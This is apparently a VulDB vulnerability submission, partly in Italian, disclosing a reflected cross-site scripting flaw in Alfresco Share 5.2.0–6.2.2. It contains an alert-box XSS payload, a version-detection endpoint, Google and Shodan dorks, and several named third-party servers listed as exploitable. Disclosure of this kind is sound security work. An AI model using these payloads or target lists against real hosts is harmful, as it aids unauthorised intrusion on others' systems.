Invia #474306: Alfresco Software Alfresco Community/Enterprise 5.2.0 to 6.2.2 Cross-Site Scriptinginformazioni

TitoloAlfresco Software Alfresco Community/Enterprise 5.2.0 to 6.2.2 Cross-Site Scripting
DescrizioneReflected Cross-Site Scripting (XSS) in Alfresco Community/Enterprise A Reflected Cross-Site Scripting (XSS) vulnerability was identified in Alfresco Community/Enterprise versions between 5.2.0 and 6.2.2. This flaw allows an attacker to execute arbitrary scripts within the victim's browser context, compromising the integrity and confidentiality of data. Affected Components: Alfresco Share (/share/s/ endpoint) Vulnerable Versions: Alfresco Community/Enterprise versions from 5.2.0 to 6.2.2. Technical Note: Versions above 6.2.2 are not affected by this vulnerability. However, a large number of Alfresco systems exposed on the internet today remain vulnerable. Technical Details The vulnerability can be exploited by injecting malicious code into unsanitized parameters in the /share/s/ endpoint. When the payload is accessed by a user, the JavaScript code executes in the victim's browser. Exploitation Payload: {{Host}}/share/s/%27%22><svg onload=alert(1)> Real-World Example: https://x.x.x.x/share/s/%27%22%3E%3Csvg%20onload=alert(1)%3E Version Detection Endpoint The Alfresco version can be identified by accessing the following endpoint: {{Host}}/alfresco/service/api/server Examples: https://x.x.x.x/alfresco/service/api/server -> Version 6.2.2 http://x.x.x.x:8090/alfresco/service/api/server -> Version 5.2.0 Tested Versions and Exploitable URLs Version 6.2.2 https://x.x.x.x/share/s/%27%22><svg onload=alert(1)> Version 6.1.2 https://cloud.caf13.fr/share/s/%27%22><svg onload=alert(1)> https://members.im2pact.org/share/s/%27%22><svg onload=alert(1)> https://forge.citl.mun.ca/share/s/%27%22><svg onload=alert(1)> Version 6.0.7 http://calas.lat/share/s/%27%22><svg onload=alert(1)> Version 5.2.7 https://x.x.x.x/share/s/%27%22><svg onload=alert(1)> Version 5.2.0 http://x.x.x.x:8090/share/s/%27%22><svg onload=alert(1)> Mitigation To mitigate this vulnerability: Upgrade to a version above 6.2.2, as it is not affected by this issue. Dorks Google Dork: intitle:"Alfresco » Login" Shodan Dork: https://www.shodan.io/search?query=http.favicon.hash%3A1333537166
Fonte⚠️ https://docs.alfresco.com/support/latest/policies/security/
Utente
 erickfernandox (UID 57733)
Sottomissione03/01/2025 15:28 (1 Anno fa)
Moderazione17/01/2025 21:37 (14 days later)
StatoAccettato
Voce VulDB292491 [Hyland Alfresco Community Edition fino a 6.2.2 URL /share/s/ cross site scripting]
Punti20

Do you know our Splunk app?

Download it now for free!